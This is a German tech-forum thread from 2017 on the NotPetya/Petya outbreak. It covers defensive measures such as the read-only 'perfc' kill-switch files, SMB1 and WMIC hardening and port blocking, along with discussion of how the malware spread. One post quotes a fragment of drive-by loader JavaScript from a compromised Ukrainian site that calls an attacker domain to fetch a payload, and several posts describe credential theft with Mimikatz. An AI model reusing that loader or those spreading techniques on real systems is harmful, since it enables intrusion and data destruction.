Petya - Impfung

[Bolko]

Petya / NotPetya / ExPetr - Impfung

Gegen den Schädling Petya / NotPetya / ExPetr gibt es eine Gegenmaßnahme.
Man muss im Ordner c:\Windows\ eine Datei namens "perfc" erzeugen (ohne Dateierweiterung) und diese schreibschützen.
Petya scheint auch Dateien perfc.dat und perfc.dll aufzurufen, also erzeugt man am besten auch diese Dummys.

c:\Windows\perfc
c:\Windows\perfc.dll
c:\Windows\perfc.dat

Petya erzeugt selber diese Datei "c:\Windows\perfc" als Flag, dass dieser Computer infiziert ist.
Bevor Petya Userdateien mit UniCrypt.exe verschlüsselt wird dieses Flag abgefragt und falls das Flag fehlt, wird verschlüsselt und anschließend das Flag gesetzt..

Zusätzlich sollte man die Windows Remote Dienste (NetBIOS und RPC) abschalten, damit sich Petya nicht im Netzwerk verbreitet, indem man in der Firewall die Ports 135, 137, 138, 139 und 445 blockiert (TCP und UDP, eingehend und ausgehend).

Außerdem sollte man den automatischen Neustart bei einem Systemfehler (den Petya provoziert) abschalten, denn dadurch kann man verhindern, dass Petya in Phase 2 Dateien, die Master File Table (MFT des NTFS-Dateisystems) und den MBR und die Festplatte verschlüsselt. Man darf dann allerdings auch nicht manuell neu booten, sondern man muss dann mit Hilfe eines alternativen Bootmediums die eigenen Daten sichern.
für Win7: Systemsteuerung, System, Erweiterte Systemeinstellungen, Erweitert, Starten und Wiederherstellen,
[_] Automatisch Neustart durchführen (Haken entfernen)

Petya verbreitet sich nicht nur über die SMB-Lücke, sondern wird auch über die Updatefunktion (ezvit.exe, Updatename mit gefälschter Microsoft-Signatur: upd.me-doc.com.ua, Datum: 27.Juni 2017) der ukrainischen Steuersoftware (M.E.Doc) verbreitet.
Es reicht also nicht aus, den Microsoft Sicherheitspatch von März 2017 zu instalieren (gegen die SMB-Lücke).

NotPetya verbreitet sich hauptsächlich über PsExec und WMIC. Die SMB-Lücke ist nur ein Fallback.
Den Verbreitungsweg per WMIC kann man durch Umbenennung behindern:
c:\Windows\System32\wbem\WMIC.exe umbenennen zu c:\Windows\System32\wbem\0WMIC.exe
c:\Windows\SysWOW64\wbem\WMIC.exe umbenennen zu c:\Windows\SysWOW64\wbem\0WMIC.exe

SMB1 abschalten, Registry::

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters]
"SMB1"=dword:00000000
"SMB2"=dword:00000001

und SMB1 abschalten, cmd:

sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled

Außerdem sollte man den Windows Scripting Host abschalten:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings]
"enabled"="0"

Entschlüsselung funktioniert nicht, weil die "Installation ID" nur aus Zufallszahlen besteht.
Es handelt sich also nicht um Erpressung/Ransom, sondern um Zerstörung.

https://www.bleepingcomputer.com/ne...found-for-petya-notpetya-ransomware-outbreak/
https://blogs.technet.microsoft.com...-old-techniques-petya-adds-worm-capabilities/
https://blog.kryptoslogic.com/malware/2017/06/28/petya.html
https://twitter.com/0xAmit/status/879764284020064256
https://twitter.com/ptsecurity/status/879779327579086848
https://www.symantec.com/connect/blogs/petya-ransomware-outbreak-here-s-what-you-need-know
https://securingtomorrow.mcafee.com...ant-petya-ransomware-spreading-like-wildfire/
https://www.heise.de/security/meldu...n-Petya-NotPetya-Ausbruch-wissen-3757607.html
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/PM_petya_global_27062017.html
http://www.borncity.com/blog/2017/06/28/neues-zur-petya-ransomware-killswitch-gefunden/
https://superuser.com/questions/637696/what-is-netbios-does-windows-need-its-ports-137-and-138-open
https://www.theregister.co.uk/2017/06/28/petya_notpetya_ransomware/
https://blog.kaspersky.de/neue-ransomware-angriffswelle-notpedya/13773/
https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/
https://www.dirks-computerecke.de/w...tischen-neustart-im-fehlerfall-abschalten.htm
https://www.nytimes.com/2017/06/28/world/europe/ukraine-ransomware-cyberbomb-accountants-russia.html

 

[ramtamtam]

Die Impfung ist für "NotPetya". Siehe Artikel

https://www.heise.de/security/meldu...n-Petya-NotPetya-Ausbruch-wissen-3757607.html

 

[GuardianAngel93]

Hi

Alle Windows Updates installieren, Antivirus aktualisieren, Firewall aktualisieren und es sollte erledigt sein..
Soweit ich gesehen habe, verschlüsselt dieser Müll eh nur MBR.. Wenn du also noch GPT einsetzt dann sollte man eigentlich nach meinem Wissenstand sowieso immun sein.

Bitte um Korrektur wenn falsch.

Gruss

 

[ramtamtam]

Quelle: https://www.heise.de/security/meldu...a-Ausbruch-wissen-3757607.html?artikelseite=2

Ein sehr ausgeklügelter Infektionsweg
Sicherheitsforscher von McAfee haben die Verbreitung des Trojaners analysiert. Dabei fällt auf, wie raffiniert der Trojaner agiert. Einmal auf dem System des Opfers angekommen, scannt die Malware das den Rechner unmittelbar umgebende Netz. Dabei geht sie im Gegensatz zu WannaCry sehr methodisch vor. Zuerst versucht NotPetya, einen Domain Server zu finden. Von diesem sammelt der Schadcode dann eine Liste von Rechnern im Netz – diese werden dann gezielt infiziert. Das erzeugt viel weniger auffälligen Traffic im Netzwerk als das wahllose Paket-Herumgesprühe von Trojanern wie WannaCry oder Conficker.

Infektionen einzelner Rechner werden zuerst einmal wie bei WannaCry über den ETERNALBLUE-Exploit probiert. Microsoft hat diese Lücke allerdings vor einiger Zeit in allen Windows-Versionen ab XP geschlossen. Die Wahrscheinlichkeit, diese Lücke jetzt noch auszunutzen, ist also recht klein. Deshalb hat NotPetya noch weitere Angriffe in petto.

Unter anderem versucht der Trojaner sich auf die versteckten ADMIN$-Verzeichnisse anderer Rechner zu kopieren und sich dann per PsExec auszuführen – wozu Admin-Rechte in der Domäne benötigt werden. Schlägt das fehl hat NotPetya noch die Möglichkeit, sich direkt über die Windows Management Instrumentation Command-line (WMIC) auf dem Zielrechner zu starten. Um an die benötigten Rechte zu kommen, bringt NotPetya ein Passwort-Dump-Tool mit, das Werkzeugen wie Mimikatz und LSADump ähnelt. Damit versucht der Trojaner, Windows-Credentials im Netz zu erbeuten. Ein solches Vorgehen sieht man normalerweise eher bei raffinierten und sehr gezielten (APT-ähnlichen) Angriffen auf sehr begehrte Ziele. Ähnliche Methoden kamen etwa bei Angriffen im Parlamentsnetz des deutschen Bundestages zur Anwendung.

Verschlüsselung der Daten und des MBR
Nach einer bestimmten Zeit (standardmäßig sind das 40 Minuten) starten sich infizierte Rechner neu. Nun verrichtet der Trojaner sein zerstörerisches Werk. Zuerst wird ein gefälschter CHKDSK-Bildschirm angezeigt, genau wie bei Petya. Im Gegensatz zu seinem Vorgänger verschlüsselt NotPetya die Daten auf der Systemplatte und den Master Boot Record (MBR) des Systems allerdings nicht mit dem SALSA20-Algorithmus, sondern mit AES-128 und RSA. Die Liste der verschlüsselten Dateien ist, im Gegensatz zu vielen anderen Kryptotrojanern, relativ kurz. Darunter sind komprimierte Archive, PDF-Dokumente, Office-Dateien, Mail-Ordner, Virtuelle Maschinen und Backup-Dateien.

Infektion und Verschlüsselung durch NotPetya funktioniert sowohl auf 32- als auch auf 64-Bit-Windows-Rechnern. Nachdem der Trojaner seine zerstörerische Arbeit durchgeführt hat, versucht er, seine Spuren zu verwischen. Command-and-Control-Server werden von dem Trojaner anscheinend nicht verwendet. Die Malware scheint einen Kill Switch zu besitzen: Ist eine bestimmte Datei auf einem System vorhanden, wird dieses nicht infiziert.

Der wichtigste Punkt ist und bleibt allerdings Windows aktuell zu halten, da gibt es nichts dran zu rütteln.

 

[luda]

Unnötige Panikmache.

 

[Bolko]

Alle Windows Updates installieren, Antivirus aktualisieren, Firewall aktualisieren und es sollte erledigt sein..

Das reicht nicht aus, da die Updatefunktion der ukrainischen Steuersoftware kompromittiert ist. Petya / NotPetya verbreitet sich dann über MEDoc und dann innerhalb des Netzwerkes zum Beispiel über NETBios und Co weiter.

Also nicht nur über SMB, sondern auch so:

All IP addresses and DHCP servers of all network adaptors
All DHCP clients of the DHCP server if ports 445/139 are open
All IP addresses within the subnet as defined by the subnet mask if ports 445/139 are open
All computers you have a current open network connection with
All computers in the ARP cache
All resources in Active Directory
All server and workstation resources in Network Neighborhood
All resources in the Windows Credential Manager (including Remote Desktop Terminal Services computers)

https://www.symantec.com/connect/blogs/petya-ransomware-outbreak-here-s-what-you-need-know

Ergänzung (29. Juni 2017)

Unnötige Panikmache.

Wieso das?
Betroffen sind Banken, U-Bahnen, Flughafen, Telekommunikation, Atomkraftwerk Tschernobyl
https://www.theverge.com/2017/6/27/15879480/petrwrap-virus-ukraine-ransomware-attack-europe-wannacry
Zuerst in der Ukraine.
Vermutlich ist das eine russische Cyber-Waffe, um dem Kriegsgegner zu schaden.

 

[wirelessy]

Im Netzwerk verbreitet es sich per psexec, wmic und den EternalBlue Exploit. Es betreibt auch Credentialharvesting, um PSExec und WMIC nutzen zu können.

 

[Bolko]

Die Impfung ist für "NotPetya".

Das BSI nennt den Schädling "Petya":
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/PM_petya_global_27062017.html

Es mag nicht unbedingt die ursprüngliche Petya-Variante sein, aber der aktuelle Schädling zählt zu dieser Petya-Familie.

Kaspersky nennt die neue Variante NotPetya:
https://www.theregister.co.uk/2017/06/28/petya_notpetya_ransomware/

Der originale Petya hatte den Zweck, Geld zu erpressen.
Die aktuelle Variante NotPetya hat viel Code mit Petya gemeinsam, nutzt aber zusätzliche Verbreitungswege und hat jetzt den Zweck, Passwörter zu stehlen und Daten zu zestören.

 

[Eck]

Das reicht nicht aus, da die Updatefunktion der ukrainischen Steuersoftware kompromittiert ist.

Und was glaubst du wie viele cbler eine ukrainische Steuersoftware nutzen?

->Panikmache, da das in DE wohl kaum jemand nutzt

 

[Fellor]

Solange kein Rechner im eigenen Netz befallen ist und niemand im Netz diese Steuersoftware nutzt, sollte man sicher sein.

Trotzdem Danke für die Hinweise.

BTW:
Hat die aktuelle Version wirklich den Zweck Passwörter zu stehlen? So wie ich das verstanden habe will die Software das Passwort nur um sich Rechte zu erschleichen.

 

[ramtamtam]

Es mag nicht unbedingt die ursprüngliche Petya-Variante sein, aber der aktuelle Schädling zählt zu dieser Petya-Familie.

Genau das ist nicht der Fall. https://blog.kaspersky.de/neue-ransomware-angriffswelle-notpedya/13773/

Unsere vorläufigen Ergebnisse legen nahe, dass es sich hierbei nicht um eine Variante der Petya-Ransomware handelt, wie derzeit öffentlich berichtet wird, sondern um eine neue Ransomware, die bisher noch nicht aufgetaucht ist.

Am Ende vom Tag ist es egal was es ist, es richtet Schaden an.

 

[Bolko]

Und was glaubst du wie viele cbler eine ukrainische Steuersoftware nutzen?

->Panikmache, da das in DE wohl kaum jemand nutzt

Es werden aber nicht nur ukrainische Computer infiziert:
https://www.symantec.com/connect/blogs/petya-ransomware-outbreak-here-s-what-you-need-know

Das Update der Steuersoftware war nur das Einfallstor, die weitere Verbreitung erfolgte über die Vernetzung, die offensichtlich weltweit funktioniert.

 

[Fellor]

Die Software benötigen wohl auch internationale Firmen die in der Ukraine Steuern zahlen müssen. Das ist das Einfallstor. Dann versucht sich die Software im umgebenden Netz zu verbreiten. Über die Verbreitung über die eigene Domäne hinaus ist nichts bekannt, wenn ich richtig gelesen habe.

 

[Bolko]

Die Software benötigen wohl auch internationale Firmen die in der Ukraine Steuern zahlen müssen.

Ja. Zum Beispiel "Maersk Line" benutzt auch "M.E.Doc":

Experience in SAP R3 & BW/ 1S / MeDoc

http://www.job2sea.com/job/82817/Accountant-–-Economist/
Ergebnis: Maersk-Server ist platt
https://my.maerskline.com/

 

[Fellor]

Ja, das stimmt. Blöd gelaufen. Trotzdem geht aktuell für den Normalverbraucher keine Gefahr aus.

 

[Bolko]

Das Ziel der Attacke war die Ukraine, denn der Schädling wurde am 27.Juni verbreitet und am 28.Juni ist in der Ukraine ein Nationalfeiertag (Tag der Verfassung). So maximiert man den Schaden.

Ergänzung (29. Juni 2017)

Ein weiterer Verbreitungsweg wurde gefunden, nämlich drive-by:

Die ukrainische Webseite bahmut.com.ua/news/ benutzt ein Javascript, das Schadcode nachlädt (drive-by, Waterhole Attack):
http://bahmut.com.ua/engine/editor/scripts/webfont.js

var REMOTE_URL = 'http://dfkiueswbgfreiwfsd.tk/i/';
...
execute_request(traffic, REMOTE_URL, apply_payload);

https://twitter.com/craiu/status/880011103161524224

Ergänzung (29. Juni 2017)

NotPetya extrahiert Passwörter mittels "Mimikatz":

https://twitter.com/omri9741/status/879786056966709248
https://github.com/gentilkiwi/mimikatz

 

[purzelbär]

Egal ob Ransomware Daten verschlüsseln, Daten zerstören oder den MBR unbrauchbar machen will, Tatsache ist das betroffene User dann erstmal Ärger damit haben und sich ärgern und ich rate jeden Heimanwender der sich nicht vielleicht darüber ärgern will, bzw der keine Datenverlust erleiden will: macht sowohl Datenbackups von Daten die nicht verloren gehen sollen als auch sog. Systembackups/images auf ein Offline Datenträgermedium wie eine USB Festplatte die nur dann am PC angeschlossen wird wenn sie benutzt wird und ansonsten offline bleibt.

 

[Onatik]

AW: Petya / NotPetya / ExPetr - Impfung

Hier noch der Fortgang der interessanten Analyse zum Schädling - alle Synonyme möchte ich hier nicht aufzählen ;-)

https://www.heise.de/security/meldu...breitungsmasche-3763750.html?artikelseite=all